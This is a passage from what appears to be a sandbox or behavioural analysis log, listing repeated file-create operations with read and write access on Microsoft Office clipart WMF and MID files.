| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01171_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01172_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01173_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01176_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01178_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01179_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01180_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01181_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01182_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01183_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01186_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01366_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01434_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01585_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01586_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01628_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01629_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01630_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01631_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01761_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01772_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\DD01793_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\EAST_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\ED00010_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\ED00019_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\ED00172_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\ED00184_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\EN00006_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\EN00202_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\EN00222_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\EN00242_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\EN00319_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\EN00320_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\EN00397_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\EN00902_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\EXPLR_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FALL_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00074_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00076_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00077_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00086_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00090_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00096_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00296_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00297_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00306_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00336_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00361_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00369_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00382_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00397_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00403_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00414_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00419_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00428_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00435_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00438_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00455_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00459_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00543_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00544_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00564_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00586_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00775_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00779_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00799_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00814_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD00965_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD01074_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD01084_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD01176_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD01191_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD01193_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD01196_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD01548_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD01657_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD01658_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD01659_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD01660_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD02068_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD02071_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD02075_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD02088_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD02097_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD02115_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD02116_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD02141_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD02153_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD02158_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FD02161_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FINCL_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FINCL_02.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\FLAP.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\GRDEN_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\GRID_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00057_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00084_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00231_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00235_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00236_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00241_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00260_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00276_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00334_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00443_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00513_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00524_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00526_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00527_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00546_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00601_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00602_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00612_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00623_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00625_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00636_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00669_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00681_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00685_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00687_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00688_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH00693_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH01013_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH01015_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH01058_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH01065_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH01080_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH01242_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH01291_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH01329_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH01461_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH01618_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH01759_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH01875_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH01923_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH02155_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH02166_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH02282_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH02298_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH02312_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HH02313_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HM00005_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HM00114_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HM00116_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
